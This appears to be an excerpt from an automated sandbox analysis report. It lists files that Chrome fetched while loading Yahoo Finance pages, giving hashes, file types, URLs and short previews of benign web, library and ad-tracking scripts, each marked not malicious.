                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9AAB7AA4795DBFF2E3830E29509671E58695234A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FC901F3F854E691822D3710EC0581E43F1F192A14EE934E16F055402EE75321D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:EB726C9DA4CD5F4F0CE1014054F387FFEC55F235A78DB3A1DF94C6D4163026BA31D90BCBEBAAC39048B68C549399380A0CF4FA5EA78775947314EF2DDCB1B1D8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/uu/api/res/1.2/hQF2Z_SG3YkVEr2UtvFbGg--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-10/a85cf280-84b7-11ef-84ef-7853959e0cfd.cf.webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8 .....f...*,...>y6.H$..!'..h...d;R.Y...qu..0=....?.{>....;.g.O..X_.}............3........K?U_..a?..N.fO...=+5E....R.~.?7..._z...~L..c.../.7........c...?._.}....r...+.......n~........c......}.....i.'....K.I...P.J.......p.Qj...@B3#.....i5...........a....s+...)!.....@`a....E.Q. .x(EPP....dR...2.Uk..;pv..G..4.....|..}...eP..1O.....kd...TOr....v..X.d.<E..r..ngo...z......A...hi..rr.7........s4.B.Q.\r..O.......$.o.....N..#A6....z(...Iv..Z.>k...b..U.r~F...*v.......Dn1`.W.j.+....x.......E..x..i.0d\..x2.{3?..+.b6..!.vd....+G.Y...-U..P...0D.P......:.|#..m!#H.78.....v.....h~..X...Nk....T...^......@...............-4.w}...-./....`{..S..Mg)..*+...~U.-&p..%.......&..Q..{.0.t.....1NZ.O....0.#.c...%d...6.J. ..Y.....i.v.Kxt.qP.\DH..:.R.W...}....^..7.".S.....y.bg+...."..g.=.~h...q.j.........-\.:...m..X...?....fO.2}.?.yv.;y.g........X...F....}..j.....e#.QyW.2a...4. S.xi..$M."..Z....(..Bu..ba.y.+..y.-.9.v..u).Fc.. ..S,.1..&..K8...:....|.S.Bh..(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (20681)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):20920
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.382951729807628
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:W4Oh1nYxEHnaDSA9O3gcXpe62Oaqz66VSwyKTWf6S6hYrJBq91D:Wtewg6dcOWyS66I
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F4BA31A6A1D636440EB73ADA2C312201
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:92A49D852D46B7E66DB1679014C692589D9803D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:596842C18CBF89B94E83E196E6B2A68DC4899B568C4129E2930C00797B8CC65C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6ADB18F26D737F5AC85EE1D35757DA9352A859C6766D4CB345B500EDB3AFDD3589EE2696526BE1008AE65E0E08EC590459ECA2E85F1E652FA54336AD9BD4BBAF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cdn.jsdelivr.net/npm/protobufjs@7.1.2/dist/minimal/protobuf.min.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/*!. * protobuf.js v7.1.0 (c) 2016, daniel wirtz. * compiled thu, 22 sep 2022 17:16:11 utc. * licensed under the bsd-3-clause license. * see: https://github.com/dcodeio/protobuf.js for details. */.!function(d){"use strict";!function(r,u,t){var n=function t(n){var i=u[n];return i||r[n][0].call(i=u[n]={exports:{}},t,i,i.exports),i.exports}(t[0]);n.util.global.protobuf=n,"function"==typeof define&&define.amd&&define(["long"],function(t){return t&&t.isLong&&(n.util.Long=t,n.configure()),n}),"object"==typeof module&&module&&module.exports&&(module.exports=n)}({1:[function(t,n,i){n.exports=function(t,n){var i=Array(arguments.length-1),e=0,r=2,s=!0;for(;r<arguments.length;)i[e++]=arguments[r++];return new Promise(function(r,u){i[e]=function(t){if(s)if(s=!1,t)u(t);else{for(var n=Array(arguments.length-1),i=0;i<n.length;)n[i++]=arguments[i];r.apply(null,n)}};try{t.apply(n||null,i)}catch(t){s&&(s=!1,u(t))}})}},{}],2:[function(t,n,i){i.length=function(t){var n=t.length;if(!n)return 0;for(var i=0;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4249), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4249
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.242820679038457
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:a6z95q7wimgV1H1BSaQg77uSy7hG1UrpsUtKkmxMtP7iCs5wqrtgfP7cujy/L4:a6x5Tg/C1cuS3W6kKpMtPeCPqrSfnjyk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:BCDA778B736C3A054AF62F437B536E78
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:08E2CDBD2D1CA160834B205D6748DC2CAB5FDD99
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:892E2F5E07FEF6DE0428E4DCB284201B3D110C0A6F2D8EF899CD2CD2C61EB546
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A0D6449A03045E723D2F668898541625E36D7394E30327F5E89E1F0640F97A1A0268F500D89E804CD8DC8FBF395DBDFA71B429E89E737E3C2DAC7A2C196EA3A7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:"use strict";function _typeof(e){return _typeof="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},_typeof(e)}!function(){var e,n,t,o,r=window,a=r.onerror,i=["apptype","rid","bucketId","bucket","device","osName","browserName","browserVersion"],c=/^resource:\/\//,s=/ActionScript|Decompress\sfail/,f={beaconPath:"p.gif",site:"fp"},d=0,w=function(){var e=r.navigator&&(navigator.connection||navigator.mozConnection||navigator.webkitConnection)||{};return{downlink:e.downlink||"",downlinkMax:e.downlinkMax||"",effectiveType:e.effectiveType||"",rtt:e.rtt||"",saveData:e.saveData||"",type:e.type||""}},u=function(){var e=r.YAHOO&&r.YAHOO.context||r.Af&&r.Af.context||{},n="";return i.forEach((function(t){"undefined"!==_typeof(e[t])&&(n+="&".concat(encodeURIComponent(t),"=").concat(encodeURIComponent(e[t])))})),n},g=function(e,n,t,o){if(!(d>3||r.naviga
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):149
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.113248701840206
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:qCIsqDmJS4RKb5ykKcvXjXRHoNcHuJuTvUMLFmLJF4ZnIFTfHpAdSHF/FkD:qT9mc4sl3O4t8TpvS4eD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:85D5335CA809D4417210B3CEA5F3FB8B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E3A89877C14BCEF43CE34F39A55B4F149F828499
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:3C1A20FC137E08AC3EE81721EE9B4B209E586ADD592A26A47D9A3072512C6DB2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D7E385C9BC0FC306D0784E72944B480938A3415E8118A87B2BCB41D27297C32271317723CCA914200A332E0BE23D13CA19BBE029B97986143137D4141CFDFB6F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const o='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M8.59 16.59 13.17 12 8.59 7.41 10 6l6 6-6 6z"/></svg>';export{o as A};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (735)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):934
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.415683850855602
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:2e2C6hHfhiVIKopIS5cbrT4N2RSSo+tEIKj:2e2C6lIYIkeoN7SB2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1C71752136B468DE415DDE9E312D5360
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D192895E1D3B76AA3B16672C1E24F405D4A5D752
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F35D03F776997DA877FD3F9D2E3395356751439394C554EFDD7AC16DD50F4E4E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6FA76A89398E60C0A2737DFA6C49344272EDDE91CCB26FC4E511F02FCA1C67DCB85EC2F6564E864455BCD0A333E842FFE0166AAE71013E41F17243C9F089B260
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://u.openx.net/w/1.0/cm?id=891039ac-a916-42bb-a651-4be9e3b201da&ph=a3aece0c-9e80-4316-8deb-faf804779bd1&gdpr=0&gdpr_consent=&r=https%3A%2F%2Fpbs.yahoo.com%2Fsetuid%3Fbidder%3Dopenx%26gdpr%3D0%26gdpr_consent%3D%26gpp%3D%26gpp_sid%3D%26f%3Di%26uid%3D%7BOPENX_ID%7D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<html>.<head><title>Pixels</title></head>.<body>.<script>if("browsingTopics"in document&&document.featurePolicy.allowsFeature("browsing-topics"))document.browsingTopics()</script>..<img src="https://pbs.yahoo.com/setuid?bidder=openx&gdpr=0&gdpr_consent=&gpp=&gpp_sid=&f=i&uid=d23c890c-93a2-0051-1cdd-46d7ce72c695"><img src="https://pixel-sync.sitescout.com/dmp/pixelSync?nid=4&gdpr=0"><img src="https://pixel.tapad.com/idsync/ex/receive?partner_id=1955&partner_device_id=ed9c753f-713a-0e3f-3db0-1e147ca5c514"><img src="https://ups.analytics.yahoo.com/ups/58294/sync?_origin=1&uid=c526854a-f257-09f1-2476-47c8d88af071"><img src="https://us-u.openx.net/w/1.0/cm?id=e508c905-ddce-4732-92a4-0b0f5b72a28f&r=https%3A%2F%2Fid.rlcdn.com%2F464246.gif%3Fpartner_uid%3D%7BOPENX_ID%7D"><img src="https://ib.adnxs.com/getuid?https://us-u.openx.net/w/1.0/sd?id=537072399&val=$UID"><img src="https://ad.turn.com/r/cs?pid=9&gdpr=0">..</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (7500)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):7501
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.3770861437837905
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:yzK5Xzzy8qhWuwRMExuA0C0Mpzzy8qktuwRMEq090fxzsOZE4fynvMDn70KHngiw:D5jeHhWxME4A0C0M9eHktxMEq090fxzw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D3A7C2A0DF64BAB125872521728E4C82
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2789EE1DEF5CB8A3AC62060811F1A959F5F2B999
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:1150AAAE0DA7578D07172B5A6F4D6E4A8A39C85E5B32EEE0E601B36A16B5EF50
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:42302F610A546FB985240ADA3B9F31216359D343817CEA320AC668CF4BF0E1ADB4ADE78B1915C901E662F6EAC3BC6F86D969F4891D9B9D0440172FA67FC4B038
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/SectionHeader.DMZXrM9r.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as K,e as S,b as P,p as I,d as w,f as H,j as U,i as d,q as v,_ as E,U as k,k as p,l as J,a4 as Q,c as j,u as V,g as C,a as N,t as q,h as R,m as X}from"./scheduler.Dr9AAxFe.js";import{S as Y,i as Z,g as A,a as g,e as D,t as h,c as y,b as $,m as x,d as ee}from"./index.DCSmZEjO.js";import{V as le}from"./ViewMoreLink.ZEdK_9F5.js";import{t as ie}from"./commonUtil.CI22_Irn.js";const se=f=>({}),W=f=>({}),ne=f=>({}),B=f=>({});function te(f){let e,l;const i=f[14].default,s=j(i,f,f[15],null),n=s||ae();return{c(){e=S("h2"),n&&n.c(),this.h()},l(t){e=w(t,"H2",{class:!0});var o=H(e);n&&n.l(o),o.forEach(d),this.h()},h(){v(e,"class","header yf-13lpgjv"),k(e,"ellipsis",f[10])},m(t,o){p(t,e,o),n&&n.m(e,null),l=!0},p(t,o){s&&s.p&&(!l||o&32768)&&V(s,i,t,t[15],l?N(i,t[15],o,null):C(t[15]),null),(!l||o&1024)&&k(e,"ellipsis",t[10])},i(t){l||(h(n,t),l=!0)},o(t){g(n,t),l=!1},d(t){t&&d(e),n&&n.d(t)}}}function fe(f){let e,l,i;const s=f[14].default,n=j(s,f,f[15],null),t=n||re();return{c(){e=S("h3"),t&&t.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, Unicode text, UTF-8 text, with very long lines (1904)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1907
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1735830637760225
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:TtU7QAaqTV3qjsNVN6Q7F9PoeWjCQ8PeZlvn:Tti/xcMNR9POZZlvn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B0FDB8A1541F9BF21B19189DCEB1FDF5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:32DD5B24044AD5B86E1088009FA89B6618E525ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8B95E9EB7E7E2A616AB88905510733475A297A975377E56E3D7A2FF5697ADE39
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:460A73133E95370816FE1CFB61A0D6D35B5B25325FCAFEFD3BBF8BB9BDDE6F1C2C6FCFE242DE70F39B8E9169FBB1A801EAC3B1724A83C5169F2B148D20A71D10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/StoryMetaPublishing.CI1QFDtu.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as S,p as h,k as u,n as b,i as d,e as k,b as p,t as v,d as N,f as q,j as D,h as P,q as y,U as o,l as _,m as C,W as I}from"./scheduler.Dr9AAxFe.js";import{S as g,i as j}from"./index.DCSmZEjO.js";function r(n){let e,i,t=(n[0]||"")+"",f,l=!n[3]&&m(n);return{c(){e=k("div"),l&&l.c(),i=p(),f=v(t),this.h()},l(s){e=N(s,"DIV",{class:!0});var a=q(e);l&&l.l(a),i=D(a),f=P(a,t),a.forEach(d),this.h()},h(){y(e,"class","publishing yf-1weyqlp"),o(e,"bolded",n[2])},m(s,a){u(s,e,a),l&&l.m(e,null),_(e,i),_(e,f)},p(s,a){s[3]?l&&(l.d(1),l=null):l?l.p(s,a):(l=m(s),l.c(),l.m(e,i)),a&1&&t!==(t=(s[0]||"")+"")&&C(f,t),a&4&&o(e,"bolded",s[2])},d(s){s&&d(e),l&&l.d()}}}function m(n){let e=(n[1]||"")+"",i,t,f,l=n[1]&&n[0]&&c();return{c(){i=v(e),t=p(),l&&l.c(),f=h()},l(s){i=P(s,e),t=D(s),l&&l.l(s),f=h()},m(s,a){u(s,i,a),u(s,t,a),l&&l.m(s,a),u(s,f,a)},p(s,a){a&2&&e!==(e=(s[1]||"")+"")&&C(i,e),s[1]&&s[0]?l||(l=c(),l.c(),l.m(f.parentNode,f)):l&&(l.d(1),l=null)},d(s){s&&(d(i),d(t),d(f)),l&&l.d(s)}}}function c(n)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3567), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3567
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.32203621037149
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:+7yzk8YvPEi6qA0zonBU07qdgp1qds7dbaXxitE+7K1Uh++xnvQ956eY+pstV0hh:+7ZPvMzBfqSqAYUU+xnI9ovINZ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C52AA1EA682AEF8AD5EBF7AFF9662E35
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E171DA979A8C5DFB1DEF6A4ED2F4C72BB787CD18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:BCE4B47B8FC12DE49FAC0A00E9039E38AA568ABA0EE9154B93D20465F0289CFA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BD010B3C92B9737B31F70E3EF108B11093075EFA80CC096B6BB3E9591DAD6E5420B50D6E949F9D2DAFBB420514906667282ED155F8E355A5738D965ED3226D34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cdn.taboola.com/scripts/cds-pips.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(t){try{var e="https://",n="aHR0cHM6Ly9waXBzLnRhYm9vbGEuY29t",r=["YXJjaGl0ZWN0dXJl","cGxhdGZvcm1WZXJzaW9u","dWFGdWxsVmVyc2lvbg=="],a=["YnJhbmRz","bW9iaWxl","bW9kZWw=","cGxhdGZvcm0=","cGxhdGZvcm1WZXJzaW9u","dWFGdWxsVmVyc2lvbg=="];t.TRC.cdsPips={userId:null,getHttpsPrefix:function t(){return e},doNothing:function t(){return!0},safeGetTfaConfig:function e(n,r,a){return t._tfa&&t._tfa.config&&t._tfa.config.safeGet&&t._tfa.config.safeGet(n,r,a)},safeGetRboxConfig:function t(e){var n;return(TRCImpl?TRCImpl.global:{})[e]},prepareGenericRequest:function e(n,r){var a,s=new(t.XDomainRequest||t.XMLHttpRequest);return s.open(n,r),s.onload=this.doNothing,s.onerror=this.doNothing,s.onprogress=this.doNothing,s},tryToReadUserIdFromLocalStorage:function t(){try{return window.localStorage["taboola global:user-id"]}catch(t){return null}},getUserId:function e(){var n=t.TFASC&&t.TFASC.tfaUserId&&"function"==typeof t.TFASC.tfaUserId.getUserId?t.TFASC.tfaUserId.getUserId():null,r=t.TRC.pageManager&&
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (7213)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):7214
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.214208203980227
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:ZKgIGQGIZVUhgGy8H72At6G+JsX/D9qYLYsGZKUG:xIrDV+xZ2AtewxLkNu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DADA04F94A4FC4D19AC57A29F0BEAB05
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:ABBC9E83436AEC35D71F4CAE162B49F31821E135
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A9C978CE0E816FE6148ABDC5B90980B165BE9E12E49F068A2504291901C229DB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A015C1EBAA29F1F12E00E7AF72D92D65C14DFF3EC618AF100BF0B651B8FA0A61B05C25611D343E6AB7ACC8DCDF58E7D6A8E14884BDC7D2E3AEE723E6FF80B5AC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(){"use strict";var e,t=-1,n=function(e){addEventListener("pageshow",(function(n){n.persisted&&(t=n.timeStamp,e(n))}),!0)},r=function(){var e=self.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0];if(e&&e.responseStart>0&&e.responseStart<performance.now())return e},i=function(){var e=r();return e&&e.activationStart||0},a=function(e,n){var a=r(),o="navigate";return t>=0?o="back-forward-cache":a&&(document.prerendering||i()>0?o="prerender":document.wasDiscarded?o="restore":a.type&&(o=a.type.replace(/_/g,"-"))),{name:e,value:void 0===n?-1:n,rating:"good",delta:0,entries:[],id:"v4-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12),navigationType:o}},o=function(e,t,n){try{if(PerformanceObserver.supportedEntryTypes.includes(e)){var r=new PerformanceObserver((function(e){Promise.resolve().then((function(){t(e.getEntries())}))}));return r.observe(Object.assign({type:e,buffered:!0},n||{})),r}}catch(e){}},c=function(e,t,n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.240239117404927
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:JS+DgWAsDQAfn:88UsDpn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C26019C2D1F82BB418B2A56B2BACB59B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B11220F5F962FAECC8E9835210C78EA7F87993BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:09343D3B3473E1C994B2D603C99FEB8A0F63FBD3FF20BE7432FF18B973DBE651
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AE42A74AE1E4AAEDA412ABBEFF6D9072A216C37CE343B103EE5FBABCD58EB9FE4CA7D4AE69D8EDD496F0F3793FBA03FBE7EE7B5C80A6AAE30D1E12B08D53CE9D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://image6.pubmatic.com/AdServer/PugMaster?sec=1&async=1&kdntuid=1&rnd=6973016&p=156212&s=0&a=0&ptask=ALL&np=0&fp=0&rp=1&mpc=0&spug=1&coppa=0&gdpr=0&gdpr_consent=&us_privacy=1YNN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:PubMatic.PugMasterCallback(false, false, true);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.790864812649304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:QCWNKCeI0l65yumO5Ayx1sEdcuY5wRfUsezmyPLKHP6DfIXa+IYdu4oU1iWNKCJT:QEI95u5wR0LKv6Grdu4oU1DE8dHGs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:69533DEE43FCB84E1728E9E7F45B4F5E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A7652CDE71E70687E7F5BC62851206397E193E86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:39C6F403514C5324067A39670524D8A207080F9D7D1F1E4C3480E98E307D21A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9E92A47AC4639CFD8CE4EC2F10F20DA5CB52BF435523C380EA64D044C38C6CFE9B1F26AE169F13AF952E376B756DE7E000B13458139EAC7B73B3FB9138CAB6A4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/StoryMetaPublishing.uqjoCQC9.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.publishing.yf-1weyqlp{align-items:center;display:flex;font-size:var(--font-s);gap:var(--space-1);line-height:1.25;white-space:nowrap;font-weight:var(--font-normal);margin-top:-1px;flex-wrap:wrap}.publishing.bolded.yf-1weyqlp{font-weight:var(--font-bold)}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://js-sec.indexww.com/ht/htw-pixel.gif?ZwWEk9HM54wAAGq0ANAUBAAA%261449=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
